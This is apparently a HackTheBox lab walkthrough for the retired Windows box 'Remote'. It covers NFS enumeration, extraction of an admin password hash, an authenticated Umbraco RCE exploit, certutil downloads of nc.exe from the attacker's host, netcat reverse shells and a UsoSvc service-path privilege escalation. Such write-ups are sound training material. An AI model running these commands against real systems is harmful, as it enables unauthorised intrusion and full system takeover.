HTB Walkthrough: Remote w/o Metasploit (retired)

Remote is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.

Hostname: Remote| Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# nmap -sC -sV -oA Remote 10.10.10.180
Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–26 17:57 EDT
Nmap scan report for 10.10.10.180
Host is up (0.030s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home — Acme Widgets
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1–3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 14m41s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021–04–26T22:13:19
|_ start_date: N/A

Browsing to http://10.10.10.180 reveals a webpage. From this page ‘http://10.10.10.180/contact/’ you will learn that they are using Umbraco forms.

┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# sudo gobuster dir -t 50 — url http://10.10.10.180 — wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/install (Status: 302) [Size: 126] [ → /umbraco/]
/Blog (Status: 200) [Size: 5011]
/about-us (Status: 200) [Size: 5451]
/People (Status: 200) [Size: 6749]
/Product (Status: 500) [Size: 3420]
/INSTALL (Status: 302) [Size: 126] [ → /umbraco/]

From gobuster results, browse to ‘http://10.10.10.180/install’ and it redirects to ‘http://10.10.10.180/umbraco/#/login’. You will land up on the same link if you click on ‘GO TO BACK OFFICE AND INSTALL FORMS’ present at http://10.10.10.180/contact/.

NFS Enumeration

──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ showmount -e 10.10.10.180

Export list for 10.10.10.180:
/site_backups (everyone)

Mounting the publicly available mount ‘site_backups’ on kali
On Kali: sudo mkdir /mnt/remote
On Kali: sudo mount -t nfs 10.10.10.180:/site_backups /mnt/remote

Go to /mnt/remote in kali and browse the contents.
From Web.config, umbraco version was found to be 7.12.4.
From Logs, we got email addresses: admin@htb.local, ssmith@htb.local.
From App_Data/Umbraco.sdf, we get hint that SHA1 is used for admin@htb.local

┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ strings Umbraco.sdf | grep “admin”
┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ strings Umbraco.sdf | grep “SHA1”
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{“hashAlgorithm”:”SHA1"}en-USf8512f97-cab1–4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{“hashAlgorithm”:”SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{“hashAlgorithm”:”SHA1"}admin@htb.localen-US82756c26–4321–4d27-b429–1b5c7c4f882f

SHA1 hash can be decoded back using online decryptor. Login with ‘admin@htb.local’/decrypted password at http://10.10.10.180/umbraco.

EXPLOITATION

Let us exploit umbraco using authenticated RCE via searchsploit.
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ searchsploit umbraco
Umbraco CMS 7.12.4 — Remote Code Execution (Authenticated)
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ sudo searchsploit -m aspx/webapps/49488.py
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ cp 49488.py rev2.py

Running the exploit to check if it executes code.
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c whoami
iis apppool\defaultapppool

You can use below command to get user flag.
┌──(kali㉿kali)-[~/labs/HTB/Remote]
└─$ sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a “type C:/Users/Public/user.txt”

Let us get reverse shell.
Checking for temp folder to upload files.
┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a “ls C:/Windows/temp”

Upload the nc file

┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a “certutil -urlcache -split -f http://<Kali IP>:8000/nc.exe C:/Windows/temp/nc.exe”
**** Online ****
0000 …
e800
CertUtil: -URLCache command completed successfully.

-URLCache Display or delete URL cache entries
-split Split embedded ASN.1 element & Save to files
-f Force Overwrite

Open a netcat session in another tab for port 9877. Executing nc.exe for reverse shell.
┌──(root💀kali)-[/home/kali/labs/HTB/Remote]
└─# sudo python rev2.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a “C:/Windows/temp/nc.exe <Kali IP> 9877 -e powershell.exe”

And you will get reverse shell + user flag.

Privilege Escalation

Using systeminfo command on target to get OS details. We need to transfer winpeas.exe to target machine.
PS C:\ftp_transfer> invoke-webrequest -Uri http://<Kali IP>:8000/winpeas.exe -OutFile winpeas.exe
Note: Always download raw version of any file from github.

Running winpeas.exe to enumerate:
PS C:\ftp_transfer> ./winpeas.exe

Enumeration interesting results.

TCP 127.0.0.1 5939 0.0.0.0 0 Listening 3020 TeamViewer_Service

There are two ways to escalate privileges. Exploit UsoSvc or TeamViewer.

Let us exploit UsoSvc. Google search for “exploit usosvc” and refer this link: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
Open a netcat session in kali at port 9002. Run below on target machine.

PS C:\Windows\temp> sc.exe config usosvc binpath= “C:\Windows\temp\nc.exe <Kali IP>9002 -e powershell.exe”
sc.exe config UsoSvc binpath= “cmd \c C:\Users\nc.exe 10.10.XX.XX 9988 -e powershell.exe”
[SC] ChangeServiceConfig SUCCESS

PS C:\Windows\temp> sc.exe stop usosvc
sc.exe stop UsoSvc

SERVICE_NAME: UsoSvc
TYPE : 30 WIN32
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x3
WAIT_HINT : 0x7530

PS C:\Windows\temp> sc.exe start UsoSvcv

And you will get reverse shell + root flag.